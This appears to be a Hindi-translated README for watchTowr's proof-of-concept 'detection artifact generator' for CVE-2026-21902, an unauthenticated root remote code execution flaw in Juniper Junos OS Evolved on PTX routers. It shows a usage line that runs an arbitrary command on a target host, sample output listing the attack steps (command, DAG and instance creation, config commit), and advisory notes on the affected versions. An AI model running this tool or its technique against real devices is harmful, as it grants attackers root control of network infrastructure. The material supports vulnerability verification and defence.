
CVE-2026-21902 के लिए जूनिपर जूनोस एवोल्व्ड पर डिटेक्शन आर्टिफैक्ट्स उत्पन्न करता है, जो कमांड और DAG निर्माण के माध्यम से अप्रमाणित रिमोट कोड निष्पादन के सत्यापन को सक्षम बनाता है।
जुनिपर Junos Evolved CVE-2026-21902 के लिए डिटेक्शन आर्टिफैक्ट जनरेटर।
https://github.com/user-attachments/assets/a7d667e1-7636-4097-ab3f-838944cdcccc
तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें।
python .\watchTowr-vs-JunosEvolved-CVE-2026-21902.py 127.0.0.1 -c "id > /var/home/admin/watchTowr.txt"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-JunosEvolved-CVE-2026-21902.py
(*) Juniper JunosEvolved Unauthenticated Remote Code Execution Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-21902]
[+] COMMAND cmd1 created
[+] DAG dag1 created
[+] DAG INSTANCE instance1 created
[+] Config committed...
[#] Waiting for command execution...
[+] Command executed, check the target for results!
यह स्क्रिप्ट यह पता लगाने का प्रयास करती है कि क्या Junos Evolved OS और PTX श्रृंखला CVE-2026-21902 के लिए असुरक्षित है।
यह समस्या PTX श्रृंखला पर Junos OS Evolved को प्रभावित करती है:
यह समस्या 25.4R1-EVO से पहले के Junos OS Evolved संस्करणों को प्रभावित नहीं करती है।
यह समस्या Junos OS को प्रभावित नहीं करती है।
अधिक जानकारी के लिए परामर्श पढ़ें Junos OS Evolved: PTX श्रृंखला: एक भेद्यता एक अप्रमाणित, नेटवर्क-आधारित हमलावर को रूट के रूप में कोड निष्पादित करने की अनुमति देती है.
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr लैब्स टीम को फॉलो करें